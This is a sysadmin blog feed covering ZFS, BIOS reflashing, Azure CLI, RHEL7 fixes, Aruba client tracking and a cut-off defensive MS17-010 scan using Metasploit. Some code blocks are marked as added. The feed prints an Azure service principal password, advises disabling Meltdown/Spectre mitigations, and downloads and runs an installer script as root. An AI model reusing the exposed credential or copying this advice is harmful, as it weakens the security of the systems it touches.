<div><b>DATAPUISTOKEMISTI</b> (blog feed by asiantuntijakaveri): The best of the A-team: not by reason, not by skill, not by work, not by pain, but by luck!</div>
<br />
<div><b>Turn single disk ZFS to mirrored ZFS</b> (asiantuntijakaveri, 2024-01-09)</div>
<p>I wanted to add some redundancy by mirroring the disk. So I did it. Note the "-s" in the zpool attach command: it makes the resilver run sequentially.</p>
<pre>
root@pve:~# zpool status -v
  pool: jemmapool
 state: ONLINE
  scan: scrub repaired 0B in 01:42:18 with 0 errors on Mon Jan  8 12:37:01 2024
config:

        NAME                                STATE     READ WRITE CKSUM
        jemmapool                           ONLINE       0     0     0
          ata-ST8000DM004-2CX188_WSC0ZW9T   ONLINE       0     0     0

errors: No known data errors

root@pve:~# zpool attach -s jemmapool \
    /dev/disk/by-id/ata-ST8000DM004-2CX188_WSC0ZW9T \
    /dev/disk/by-id/ata-WDC_WD80EZAZ-11TDBA0_7SJS82WW

root@pve:~# zpool status -v
  pool: jemmapool
 state: ONLINE
status: One or more devices is currently being resilvered.  The pool will
        continue to function, possibly in a degraded state.
action: Wait for the resilver to complete.
  scan: scrub repaired 0B in 01:42:18 with 0 errors on Mon Jan  8 12:37:01 2024
  scan: resilver (mirror-0) in progress since Tue Jan  9 18:49:24 2024
        951M / 2.85T scanned at 191M/s, 950M / 2.85T issued at 191M/s
        822M resilvered, 0.03% done, 04:20:30 to go
config:

        NAME                                  STATE     READ WRITE CKSUM
        jemmapool                             ONLINE       0     0     0
          mirror-0                            ONLINE       0     0     0
            ata-ST8000DM004-2CX188_WSC0ZW9T   ONLINE       0     0     0
            ata-WDC_WD80EZAZ-11TDBA0_7SJS82WW ONLINE       0     0     0  (resilvering)

errors: No known data errors
</pre>
<br />
<div><b>Fix ZFS device names</b> (asiantuntijakaveri, 2024-01-09)</div>
<p>So you screwed up and created a zpool using /dev/sdb instead of /dev/disk/by-id/ata-* as the device? Then you tried to fix it and ended up with a cryptic wwn-* device name. Here's a dirty solution. Make sure to run the commands right after each other, chained on one line: otherwise the pool gets imported back automatically with the wrong device names before you have time to import it with the correct ones.</p>
<pre>
root@pve:~# zpool status -v
  pool: jemmapool
 state: ONLINE
  scan: scrub repaired 0B in 01:42:18 with 0 errors on Mon Jan  8 12:37:01 2024
config:

        NAME        STATE     READ WRITE CKSUM
        jemmapool   ONLINE       0     0     0
          sdb       ONLINE       0     0     0

errors: No known data errors

root@pve:~# zpool export jemmapool && \
    mv -f /dev/disk/by-id/wwn* /dev/disk/by-id/usb* /dev/disk && \
    zpool import -d /dev/disk/by-id/ jemmapool && \
    mv -f /dev/disk/wwn* /dev/disk/usb* /dev/disk/by-id/

root@pve:~# zpool status -v
  pool: jemmapool
 state: ONLINE
  scan: scrub repaired 0B in 01:42:18 with 0 errors on Mon Jan  8 12:37:01 2024
config:

        NAME                                STATE     READ WRITE CKSUM
        jemmapool                           ONLINE       0     0     0
          ata-ST8000DM004-2CX188_WSC0ZW9T   ONLINE       0     0     0

errors: No known data errors
</pre>
<br />
<div><b>Repairing beeping Lenovo T440p</b> (asiantuntijakaveri, 2022-11-10)</div>
<p>The laptop powers on but nothing shows on the screen. This is often because the BIOS flash chip (Winbond W25Q32FVSIQ, 32Mbit / 4MB, 2.7V - 3.6V, SPI/QPI) loses its programming over time, and one day the laptop simply no longer boots. At first it blinks some LEDs on the keyboard and turns off; then it degrades to just beeping on boot.</p>
<div>Get a CH341A programmer. Since the flash is a 3.3V part, do not use the included 1.8V adapter. Make sure you use 3.3V, not 5V: there's a jumper on the CH341A for that.</div>
<div><br /></div>
<div>Download drivers, tools and BIOS images from <a href="https://drive.google.com/drive/folders/1A-DLSZHRASffboJmlgickNsRt5YB_CAr?usp=sharing">https://drive.google.com/drive/folders/1A-DLSZHRASffboJmlgickNsRt5YB_CAr?usp=sharing</a>.</div>
<div><br /></div>
<div>See <a href="https://winraid.level1techs.com/t/guide-flash-bios-with-ch341a-programmer/32948">https://winraid.level1techs.com/t/guide-flash-bios-with-ch341a-programmer/32948</a> for how to connect the wires and use the programming tool.</div>
<div><br /></div>
<div>Remove the battery and open the bottom of the laptop, remove the RAM and connect the programmer to the flash chip at U49.</div>
<div><br /></div>
<div>Connect the programmer to a USB port on a Windows PC, install the drivers, and launch CH341A_c.exe (v1.29) as admin.</div>
<div><br /></div>
<div>Select Type: 25\26 SPI FLASH, Manu WINBOND, Name W25Q32FV.</div>
<div><br /></div>
<div>Click Detect and make sure the chip is properly found.</div>
<div><br /></div>
<div>Back up the old (bad) BIOS just in case by reading it and saving it to disk.</div>
<div><br /></div>
<div>Program the chip with "Lenovo Thinkpad VILT2 NM-A131 W25Q32 U49.bin".</div>
<div><br /></div>
<div>Disconnect the programmer, install the RAM, close the bottom, install the battery, power on and flash BIOS v2.47 from Lenovo.</div>
<div><br /></div>
<div>Newer BIOSes contain Meltdown / Spectre fixes that slow the PC down. Make sure you also disable the Meltdown / Spectre mitigations on the OS side; see <a href="https://make-linux-fast-again.com/">https://make-linux-fast-again.com/</a> and <a href="https://www.grc.com/inspectre.htm">https://www.grc.com/inspectre.htm</a> for details.</div>
<br />
<div><b>Hiding Azure Enterprise App from users using az cli or PowerShell</b> (asiantuntijakaveri, 2020-12-03)</div>
<p>Toggling the "Visible to users" setting in the portal adds / removes a tag called HideApp.</p>
Hide app:<br />
<pre>
~$ az ad sp update --id f5f6ecff-8661-4726-a83f-8e7db8aa068f --add tags "HideApp"
</pre>
"Unhide" app:<br />
<pre>
~$ az ad sp show --id f5f6ecff-8661-4726-a83f-8e7db8aa068f --query tags
[
  "HideApp",
  "WindowsAzureActiveDirectoryIntegratedApp"
]

~$ az ad sp update --id f5f6ecff-8661-4726-a83f-8e7db8aa068f --remove tags 0
[
  "WindowsAzureActiveDirectoryIntegratedApp"
]
</pre>
The 0 in "--remove tags 0" is the list index of "HideApp" in the output of the preceding show command, so check that output first.<br />
<br />
For a PowerShell example see <a href="https://docs.microsoft.com/en-us/azure/active-directory/manage-apps/hide-application-from-user-portal">https://docs.microsoft.com/en-us/azure/active-directory/manage-apps/hide-application-from-user-portal</a>.
<br />
<br />
<div><b>How to get list of Azure service tags and IP ranges using az cli</b> (asiantuntijakaveri, 2020-11-12)</div>
<p>Microsoft provides a weekly updated list of the IP addresses used by various Azure features as a <a href="https://www.microsoft.com/en-us/download/details.aspx?id=56519" rel="nofollow" target="_blank">downloadable JSON</a> file on their webpage. Automating its download is however not supported and prone to breakage.</p>
<p>The same information is now also available via the Azure Service Tag Discovery API. The new API is still in public preview, and the list of IPs it provides is far shorter than what the downloadable file contains. So either the list of IPs from the API is tailored to your particular subscription or it is incomplete.<br /><br />The Discovery API requires an authenticated session to Azure, so we create a service principal and a custom RBAC role to keep things secure. See you for more after the break.</p>
<p># Login using your admin account<br /><b>az login</b></p>
<pre>
[
  {
    "cloudName": "AzureCloud",
    "homeTenantId": "e6e3b750-3e14-448f-af73-516e1b3b4324",
    "id": "739af45c-37c7-4420-b302-03c0ee7cd9e0",
    "isDefault": true,
    "managedByTenants": [],
    "name": "Azure Pass - Sponsorship",
    "state": "Enabled",
    "tenantId": "e6e3b750-3e14-448f-af73-516e1b3b4324",
    "user": {
      "name": "asiantuntijakaveri@root",
      "type": "user"
    }
  }
]
</pre>
<p># Get SubscriptionId<br /><b>az account list --all --output table</b></p>
<pre>
Name                      CloudName    SubscriptionId                        State    IsDefault
------------------------  -----------  ------------------------------------  -------  -----------
Azure Pass - Sponsorship  AzureCloud   739af45c-37c7-4420-b302-03c0ee7cd9e0  Enabled  True
</pre>
<p># Register network provider - required if you're trying this on an empty sub<br /><b>az provider register --namespace 'Microsoft.Network'</b></p>
<p># Create json file that defines the custom rbac role</p>
<pre>
cat <<'__EOF__' > custom-rbac-servicetag-reader.json
{
  "Name": "Custom: Service Tag Discovery API Reader",
  "IsCustom": true,
  "Description": "Lets you view list of service tags and their IP ranges using Service Tag Discovery API.",
  "Actions": [
    "Microsoft.Network/locations/*/serviceTags/read"
  ],
  "NotActions": [],
  "dataActions": [],
  "notDataActions": [],
  "AssignableScopes": [
    "/subscriptions/739af45c-37c7-4420-b302-03c0ee7cd9e0"
  ]
}
__EOF__
</pre>
<p># Create custom rbac on Azure<br /><b>az role definition create --role-definition custom-rbac-servicetag-reader.json</b></p>
<p># Verify that the role was created successfully<br /><b>az role definition list --custom-role-only true --output json --query '[].{roleName:roleName, roleType:roleType}'</b></p>
<pre>
[
  {
    "roleName": "Custom: Service Tag Discovery API Reader",
    "roleType": "CustomRole"
  }
]
</pre>
<p># Create a service principal that is only allowed to read service tag IP ranges<br /><b>az ad sp create-for-rbac -n "https://servicetagdiscoveryapi-reader" --role "Custom: Service Tag Discovery API Reader" --scopes /subscriptions/739af45c-37c7-4420-b302-03c0ee7cd9e0</b></p>
<pre>
Creating a role assignment under the scope of "/subscriptions/739af45c-37c7-4420-b302-03c0ee7cd9e0"
{
  "appId": "26099423-d274-4b6e-9953-b523c2bf50b5",
  "displayName": "servicetagdiscoveryapi-reader",
  "name": "https://servicetagdiscoveryapi-reader",
  "password": "Tfgg.k5t_oyltLzN0_XkIf.gGa8.W1wSsD",
  "tenant": "e6e3b750-3e14-448f-af73-516e1b3b4324"
}
</pre>
<p># Logout admin account<br /><b>az logout</b></p>
<p># Login using the service principal<br /><b>az login --service-principal -u 26099423-d274-4b6e-9953-b523c2bf50b5 -p Tfgg.k5t_oyltLzN0_XkIf.gGa8.W1wSsD --tenant e6e3b750-3e14-448f-af73-516e1b3b4324</b></p>
<pre>
[
  {
    "cloudName": "AzureCloud",
    "homeTenantId": "e6e3b750-3e14-448f-af73-516e1b3b4324",
    "id": "739af45c-37c7-4420-b302-03c0ee7cd9e0",
    "isDefault": true,
    "managedByTenants": [],
    "name": "Azure Pass - Sponsorship",
    "state": "Enabled",
    "tenantId": "e6e3b750-3e14-448f-af73-516e1b3b4324",
    "user": {
      "name": "26099423-d274-4b6e-9953-b523c2bf50b5",
      "type": "servicePrincipal"
    }
  }
]
</pre>
<p># Get the list of service tags and their IP ranges.<br /># The location parameter is required and must be valid, but is irrelevant as the json response is the same for all regions<br /><b>az network list-service-tags --location westeurope</b></p>
<pre>
{
  "changeNumber": "67",
  "cloud": "Public",
  "id": "/subscriptions/739af45c-37c7-4420-b302-03c0ee7cd9e0/providers/Microsoft.Network/serviceTags/Public",
  "name": "Public",
  "type": "Microsoft.Network/serviceTags",
  "values": [
    {
      "id": "ActionGroup",
      "name": "ActionGroup",
      "properties": {
        "addressPrefixes": [
          "13.66.143.220/30",
          "13.67.10.124/30",
          "13.69.109.132/30",
          "13.71.199.112/30",
...
</pre>
<p>Also see:<br /><a href="https://docs.microsoft.com/en-us/azure/role-based-access-control/custom-roles-cli">https://docs.microsoft.com/en-us/azure/role-based-access-control/custom-roles-cli</a><br /><a href="https://docs.microsoft.com/en-us/azure/virtual-network/service-tags-overview">https://docs.microsoft.com/en-us/azure/virtual-network/service-tags-overview</a><br /><a href="https://lnx.azurewebsites.net/non-interactive-login-in-azure-cli-2-0/">https://lnx.azurewebsites.net/non-interactive-login-in-azure-cli-2-0/</a></p>
<br />
<div><b>RHEL7 / CentOS7 network interface going down once per hour</b> (asiantuntijakaveri, 2017-06-16)</div>
<br />
There's a really bizarre bug in RHEL7 / CentOS7.
Once per hour NetworkManager removes the IP addresses from the ethernet interface after hitting some bug and triggering its "link loss" action. The interface may or may not come back by itself. It does come back when you log in as root on the console, as the login triggers some repair action via systemd...<br />
<br />
<br /><br />
This bug has been there for quite a while, since the oldest report of exactly the same problem is from <a href="https://www.centos.org/forums/viewtopic.php?t=52690">May 2015</a> with Hyper-V. Luckily for me someone figured out a bit more detail on this problem in <a href="https://www.reddit.com/r/linux4noobs/comments/5s0mhq/loss_of_wired_connectivity_one_second_and_one/">February 2017</a> running KVM. I'm using ESXi, so it's obviously not virtualization platform related.<br />
<br />
Edit GRUB_CMDLINE_LINUX in /etc/default/grub to include "net.ifnames=0 biosdevname=0". This is required for the ethernet adapter to have a predictable name (eth0) instead of the randomized junk like ens224 it gets by default.<br />
<br />
Tell grub to use the new kernel parameters on the next reboot:<br />
grub2-mkconfig -o "$(readlink -e /etc/grub2.cfg)"<br />
<br />
Fix the network configuration script ifcfg-ens224 in /etc/sysconfig/network-scripts/:<br />
1. Change NAME=ens224 to NAME=eth0<br />
2. Change DEVICE=ens224 to DEVICE=eth0<br />
3. Generate a new unique id with "uuidgen" and replace the old uuid value on the UUID= line with it.<br />
<br />
Save the changes and rename ifcfg-ens224 to ifcfg-eth0.<br />
<br />
Reboot.<br />
<br />
That's it. Now systemd/NetworkManager won't shut down your ethernet interface once per hour.<br />
<br />
Of course there are likely a bunch of other bugs and corner cases in NetworkManager that may still kill your network. Therefore it's always recommended to disable it unless you really need some NetworkManager-specific features.<br />
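The grub and ifcfg edits above as a re-runnable script. This is an added example, not code from the original post; it assumes root, takes the file locations as arguments so it can be tried on copies first, and falls back to the kernel's UUID generator when uuidgen is not installed.

```shell
#!/bin/sh
# Added example (not from the original post): scripts the GRUB_CMDLINE_LINUX edit
# and the ifcfg-ens224 -> ifcfg-eth0 rewrite described above. Assumed usage:
#   add_grub_params /etc/default/grub net.ifnames=0 biosdevname=0
#   rename_ifcfg /etc/sysconfig/network-scripts ens224 eth0
set -eu

# add_grub_params <grub-default-file> <param>... : add each parameter to the
# GRUB_CMDLINE_LINUX="..." line unless it is already there (safe to re-run).
# Parameters must not contain sed metacharacters such as / or &.
add_grub_params() {
    file=$1; shift
    for p in "$@"; do
        if grep -q "^GRUB_CMDLINE_LINUX=.*[\" ]$p[\" ]" "$file"; then
            continue                      # already present, nothing to do
        fi
        sed -e "s/^\(GRUB_CMDLINE_LINUX=\"[^\"]*\)\"/\1 $p\"/" \
            -e 's/^\(GRUB_CMDLINE_LINUX=\)" /\1"/' "$file" > "$file.tmp"
        mv "$file.tmp" "$file"
    done
}

# new_uuid: uuidgen comes with util-linux on RHEL7; fall back to the kernel's generator
new_uuid() {
    if command -v uuidgen >/dev/null 2>&1; then uuidgen
    else cat /proc/sys/kernel/random/uuid; fi
}

# rename_ifcfg <dir> <old-name> <new-name>: steps 1-3 above plus the rename.
# Prints the new UUID; refuses to clobber an existing ifcfg-<new-name>.
rename_ifcfg() {
    dir=$1 old=$2 new=$3
    src="$dir/ifcfg-$old" dst="$dir/ifcfg-$new"
    [ -f "$src" ] || { echo "missing $src" >&2; return 1; }
    [ -e "$dst" ] && { echo "$dst already exists, refusing to overwrite" >&2; return 1; }
    uuid=$(new_uuid)
    # Rewrite only NAME, DEVICE and UUID; BOOTPROTO, IPADDR, HWADDR etc. are kept as-is.
    sed -e "s/^NAME=.*/NAME=$new/" \
        -e "s/^DEVICE=.*/DEVICE=$new/" \
        -e "s/^UUID=.*/UUID=$uuid/" "$src" > "$dst"
    rm -f "$src"
    echo "$uuid"
}
```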
<br />
systemctl mask NetworkManager<br />
systemctl stop NetworkManager<br />
systemctl disable NetworkManager<br />
<br />
And reboot. Because rebooting is so much fun.<br />
<br /><div><b>Migrating user accounts from older Linux to RHEL7 / CentOS7</b> (asiantuntijakaveri, 2017-06-15)</div><br />Another pointless change just to break backwards compatibility: RHEL7 and CentOS7 prevent users with a uid lower than 1000 from logging in. This is bad when you're migrating accounts from an existing Linux server where uids start at 500.<br />
<br />
A number of configuration files under /etc/pam.d enforce this limit. Editing them by hand works until the next time authconfig is executed, and then the default setting is back.<br />
<br />
Fix this by editing /etc/login.defs and changing UID_MIN and GID_MIN from the default 1000 to 500.<br />
Then run "authconfig --update"<br />
<br />
Before:<br />
/etc/pam.d/password-auth:auth requisite pam_succeed_if.so uid >= 1000 quiet_success<br />
/etc/pam.d/password-auth:account sufficient pam_succeed_if.so uid < 1000 quiet<br />
<br />
After:<br />
/etc/pam.d/password-auth:auth requisite pam_succeed_if.so uid >= 500 quiet_success<br />
/etc/pam.d/password-auth:account sufficient pam_succeed_if.so uid < 500 quiet<br />
<div>
<br /></div>
<div>
<br /></div>
<div>
I used the following commands to migrate user logins with passwords. The rest is easy: just rsync the home directories across the network or do an NFS mount.</div>
<div>
<br /></div>
<div>
<div>
awk -F: '{if ($3 >= 500 && $3 < 1000) { print } }' passwd.gramps >>/etc/passwd</div>
<div>
awk -F: '{if ($3 >= 500 && $3 < 1000) { print } }' group.gramps >>/etc/group</div>
<div>
# join on the exact user name: a regex list fed to egrep -f would also match "al" inside "alice"<br />awk -F: 'FILENAME == ARGV[1] { if ($3 >= 500 && $3 < 1000) want[$1] = 1; next } $1 in want' passwd.gramps shadow.gramps >>/etc/shadow</div>
<div>
<br /></div>
<div>
And grant sudo access by adding my login to the wheel group.</div>
<div>
<br /></div>
<div>
usermod -aG wheel asiantuntijakaveri</div>
</div>
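The same merge with the checks a practitioner wants before appending to /etc/passwd: a name or uid that already exists on the new host is skipped, and shadow lines are selected by exact user name. This is an added example, not code from the original post; it assumes the copied passwd, shadow and group files sit in one directory and that the target directory is /etc on the new host.

```shell
#!/bin/sh
# Added example (not from the original post): merges the 500-999 uid range from
# copied passwd/shadow/group files into a target directory, refusing any entry
# whose name or numeric id is already taken there. Assumed usage:
#   migrate_accounts /root/gramps /etc     # /root/gramps holds passwd, shadow, group from the old host
set -eu

LOW=500 HIGH=1000    # same range as the awk one-liners above

# wanted_names <src> <dst>: names from src (passwd or group format) whose id is in
# range and whose name and id are both unused in dst; collisions are reported on stderr
wanted_names() {
    awk -F: -v lo="$LOW" -v hi="$HIGH" '
        FILENAME == ARGV[1] { name[$1] = 1; id[$3] = 1; next }      # existing dst entries
        $3 < lo || $3 >= hi  { next }                                # outside the migrated range
        ($1 in name) || ($3 in id) {
            print "skipping " $1 " (id " $3 "): name or id already present" > "/dev/stderr"; next
        }
        { print $1 }' "$2" "$1"
}

# append_by_name <names-file> <src> <dst>: copy the src lines whose first field is
# listed, matching the whole name (egrep -f would also match "al" inside "alice")
append_by_name() {
    tmp=$(mktemp)
    awk -F: 'FILENAME == ARGV[1] { want[$1] = 1; next } $1 in want' "$1" "$2" > "$tmp"
    cat "$tmp" >> "$3"
    rm -f "$tmp"
}

# migrate_accounts <srcdir> <dstdir>: prints the number of user accounts migrated
migrate_accounts() {
    src=$1 dst=$2
    users=$(mktemp) groups=$(mktemp)
    wanted_names "$src/passwd" "$dst/passwd" > "$users"
    append_by_name "$users" "$src/passwd" "$dst/passwd"
    append_by_name "$users" "$src/shadow" "$dst/shadow"    # shadow has no uid column: key on the names just added
    wanted_names "$src/group" "$dst/group" > "$groups"     # groups get the same name/gid collision check
    append_by_name "$groups" "$src/group" "$dst/group"
    wc -l < "$users" | tr -d ' '
    rm -f "$users" "$groups"
}
```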
<div>
<br /></div>
<div><b>RHEL7 / CentOS7 with sshd on ports 22 and 443</b> (asiantuntijakaveri, 2017-06-15)</div><br />Short version: not as simple as you thought.<br />
<br />
If you've tried to run sshd on port 443 on a RHEL7 / CentOS7 server with SELinux enabled, you're probably familiar with these errors:<br />
<br />
sshd[834]: error: Bind to port 443 on 0.0.0.0 failed: Permission denied.<br />
sshd[834]: error: Bind to port 443 on :: failed: Permission denied.<br />
ValueError: Port tcp/443 already defined<br />
ValueError: Port tcp/443 is defined in policy, cannot be deleted<br />
<br />
Solution:<br />
<br />
yum install policycoreutils-python<br />
semanage port -m -t ssh_port_t -p tcp 443<br />
<br />
firewall-cmd --permanent --zone=public --add-port=443/tcp<br />
firewall-cmd --reload<br />
<div>
</div>
<br />
echo "Port 22" >>/etc/ssh/sshd_config<br />
echo "Port 443" >>/etc/ssh/sshd_config<br />
systemctl restart sshd.service<br />
<br />
<br /><div><b>Tracking wired client behind Aruba AP</b> (asiantuntijakaveri, 2017-05-19)</div><br />So you have a setup with Aruba RAPs that bridge their wired ports to a VLAN on the controller. The web interface only tracks wireless clients, so you have no idea which AP a client with a particular IP is connected to.<br />
<br />
Log in to the controller CLI using SSH. Read-only access is enough; no need to be admin.<br />
<br />
First we need to find the MAC for the IP.<br />
<br />
<span style="font-family: Courier New, Courier, monospace;">(PYONGYANG-WLC-1) #show arp | include <b>10.42.235.4</b></span><br />
<span style="font-family: Courier New, Courier, monospace;">Protocol Address Hardware Address Interface</span><br />
<span style="font-family: Courier New, Courier, monospace;">Internet 10.42.235.4 <b>A4:6F:D9:E8:FF:15</b> vlan2504</span><br />
<br />
Now that we know the MAC, let's find the tunnel it's bridged over.<br />
<br />
<span style="font-family: Courier New, Courier, monospace;">(PYONGYANG-WLC-1) #show datapath bridge | include <b>A4:6F:D9:E8:FF:15</b></span><br />
<span style="font-family: Courier New, Courier, monospace;"><br /></span>
<span style="font-family: Courier New, Courier, monospace;">Datapath Bridge Table Entries</span><br />
<span style="font-family: Courier New, Courier, monospace;">-----------------------------</span><br />
<span style="font-family: Courier New, Courier, monospace;"><br /></span>
<span style="font-family: Courier New, Courier, monospace;">Flags: P - Permanent, D - Deny, R - Roamed Client, M - Mobile, X - Xsec, A - Auth, T - Trusted</span><br />
<span style="font-family: Courier New, Courier, monospace;"><br /></span>
<span style="font-family: Courier New, Courier, monospace;"> MAC VLAN Assigned VLAN Destination Flags Age</span><br />
<span style="font-family: Courier New, Courier, monospace;">----------------- ---- ------------- ----------- ------- ----</span><br />
<span style="font-family: Courier New, Courier, monospace;">A4:6F:D9:E8:FF:15 2504 2504 <b>tunnel 196</b> 0</span><br />
<br />
If you're interested, you can use the same command to check for any other clients connected to the same AP.<br />
<br />
<span style="font-family: Courier New, Courier, monospace;">(PYONGYANG-WLC-1) #show datapath bridge | include "<b>tunnel 196</b>"</span><br />
<span style="font-family: Courier New, Courier, monospace;">A4:6F:D9:E8:FF:15 2504 2504 tunnel 196 0</span><br />
<span style="font-family: Courier New, Courier, monospace;">A4:6F:E5:15:37:08 2504 2504 tunnel 196 0</span><br />
<span style="font-family: Courier New, Courier, monospace;">A4:6F:72:53:47:3E 2504 2504 tunnel 196 0</span><br />
<div>
<br /></div>
<div>
Now that we know the tunnel ID, we can use it to look up the AP's (temporary) IP.</div>
<div>
<br /></div>
<div>
<div>
<span style="font-family: Courier New, Courier, monospace;">(PYONGYANG-WLC-1) #show datapath tunnel | include <b>196</b></span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><br /></span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">Datapath Tunnel Table Entries</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">-----------------------------</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><br /></span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">Flags: E - Ether encap, I - Wi-Fi encap, R - Wired tunnel, F - IP fragment OK</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"> W - WEP, K - TKIP, A - AESCCM, G - AESGCM, M - no mcast src filtering</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"> S - Single encrypt, U - Untagged, X - Tunneled node, 1(cert-id) - 802.1X Term-PEAP</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"> 2(cert-id) - 802.1X Term-TLS, T - Trusted, L - No looping, d - Drop Bcast/Unknown Mcast,</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"> D - Decrypt tunnel, a - Reduce ARP packets in the air, e - EAPOL only</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"> C - Prohibit new calls, P - Permanent, m - Convert multicast</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"> n - Convert RAs to unicast(VLAN Pooling/L3 Mobility enabled), s - Split tunnel</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"> V - enforce user vlan(open clients only)</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"> H - Standby (HA-Lite), c - IP Compression, g - PAN GlobalProtect Tunnel</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><br /></span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"># Source Destination Prt Type MTU VLAN Acls BSSID Decaps Encaps Heartbeats Cpu QSz Flags EncapKBytes DecapKBytes</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">------ -------------- -------------- --- ---- ---- ---- ----------------------- ----------------- ---------- ---------- ---------- --- --- ----- ------------- -----------</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">196 192.168.8.36 <b>172.17.0.81</b> 47 8110 1200 2504 0 0 2 0 0 00:1A:1E:01:45:13 2019039 1972939 0 13 0 TEPR</span></div>
</div>
<div>
<br /></div>
<div>
Almost there: now just check which AP has that IP.</div>
<div>
<br /></div>
<div>
<div>
<span style="font-family: Courier New, Courier, monospace;">(PYONGYANG-WLC-1) #<b>show ap database | include 172.17.0.81</b></span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><br /></span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">Flags: U = Unprovisioned; N = Duplicate name; G = No such group; L = Unlicensed</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"> I = Inactive; D = Dirty or no config; E = Regulatory Domain Mismatch</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"> X = Maintenance Mode; P = PPPoE AP; B = Built-in AP; s = LACP striping</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"> R = Remote AP; R- = Remote AP requires Auth; C = Cellular RAP;</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"> c = CERT-based RAP; 1 = 802.1x authenticated AP; 2 = Using IKE version 2</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"> u = Custom-Cert RAP; S = Standby-mode AP; J = USB cert at AP</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"> i = Indoor; o = Outdoor</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"> M = Mesh node; Y = Mesh Recovery</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><br /></span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">AP Database</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">-----------</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">Name Group AP Type IP Address Status Flags Switch IP Standby IP</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">---- ----- ------- ---------- ------ ----- --------- ----------</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><b>PYONGYANG-RAP25</b> RAP-PYONGYANG RAP-3WN 172.17.0.81 Up 11d:5h:15m:38s Rc2 192.168.8.36 0.0.0.0</span></div>
</div>
<div>
<br /></div>
<div>
That's it. The problem client is connected to RAP25.</div>
<div>
<br /></div>
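The four lookups above chained into one command, so a help-desk ticket with only an IP can be resolved to an AP name in one go. This is an added example, not code from the original post; it assumes read-only SSH access to the controller (WLC_HOST and WLC_USER are placeholders you set), that the session does not page its output, and that each table keeps the column layout shown in the transcript above.

```shell
#!/bin/sh
# Added example (not from the original post): resolves client IP -> MAC -> tunnel
# -> AP inner IP -> AP name using the same show commands as the walkthrough above.
# Assumed: WLC_HOST and WLC_USER are set by you; output is not paged.
set -eu

# wlc_cmd <cli command>: run one show command on the controller and print its output
wlc_cmd() {
    ssh -o BatchMode=yes "${WLC_USER:-readonly}@${WLC_HOST:?set WLC_HOST}" "$1"
}

# Each step filters the full table locally; columns as in the transcript above.
mac_for_ip()       { wlc_cmd "show arp"             | awk -v ip="$1"  '$1 == "Internet" && $2 == ip { print $3; exit }'; }
tunnel_for_mac()   { wlc_cmd "show datapath bridge" | awk -v mac="$1" '$1 == mac && $4 == "tunnel" { print $5; exit }'; }
ap_ip_for_tunnel() { wlc_cmd "show datapath tunnel" | awk -v id="$1"  '$1 == id && $3 ~ /^[0-9.]+$/ { print $3; exit }'; }
ap_name_for_ip()   { wlc_cmd "show ap database"     | awk -v ip="$1"  '$4 == ip { print $1; exit }'; }

# track_wired_client <client ip>: prints "ip mac tunnel ap-ip ap-name";
# returns non-zero, with the failing step on stderr, if any lookup comes up empty
track_wired_client() {
    ip=$1
    mac=$(mac_for_ip "$ip")
    [ -n "$mac" ]  || { echo "no ARP entry for $ip" >&2; return 1; }
    tun=$(tunnel_for_mac "$mac")
    [ -n "$tun" ]  || { echo "$mac is not bridged over a tunnel (wireless or roamed client?)" >&2; return 1; }
    apip=$(ap_ip_for_tunnel "$tun")
    [ -n "$apip" ] || { echo "tunnel $tun not found in the tunnel table" >&2; return 1; }
    ap=$(ap_name_for_ip "$apip")
    [ -n "$ap" ]   || { echo "no AP with inner IP $apip in the AP database" >&2; return 1; }
    echo "$ip $mac $tun $apip $ap"
}
```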
<div><b>Scan Intranet for Windows PCs missing MS17-010 / WannaCry / NSA ETERNALBLUE patches</b> (asiantuntijakaveri, 2017-05-15)</div><div>
So you have used all your tricks to get the MS17-010 fix deployed, but how do you confirm that every forgotten PC on your network is actually patched?</div>
<div>
<br /></div>
<div>
We'll scan our intranet using Metasploit, checking for this particular vulnerability. PCs with a local firewall blocking SMB traffic will be missed, but those are not exploitable anyway due to the same firewall.</div>
<br /></div>
I'll keep this short.<br />
<div>
<br /></div>
<div>
- Install virtual machine with Ubuntu 16.04 Server: <b>http://releases.ubuntu.com/16.04/ubuntu-16.04.2-server-amd64.iso</b></div>
<div>
- You can use defaults during install but it's recommended to enable OpenSSH Server for remote access over LAN</div>
<div>
<br /></div>
<div>
- After install is complete login using account you created during install</div>
<div>
- Switch to root</div>
<div>
<b> sudo su -</b></div>
<div>
- Apply latest bugfixes and reboot </div>
<div>
<b> apt-get update && apt-get -y dist-upgrade && reboot</b></div>
<div>
<br /></div>
<div>
- After reboot login and switch to root</div>
<div>
<b>sudo su -</b></div>
<div>
- Install latest Metasploit nightly</div>
<div>
<b> cd /tmp</b></div>
<div>
<b> wget -O msfinstall https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb</b></div>
<div>
<b> chmod a+x msfinstall</b></div>
<div>
<div>
<b> ./msfinstall</b></div>
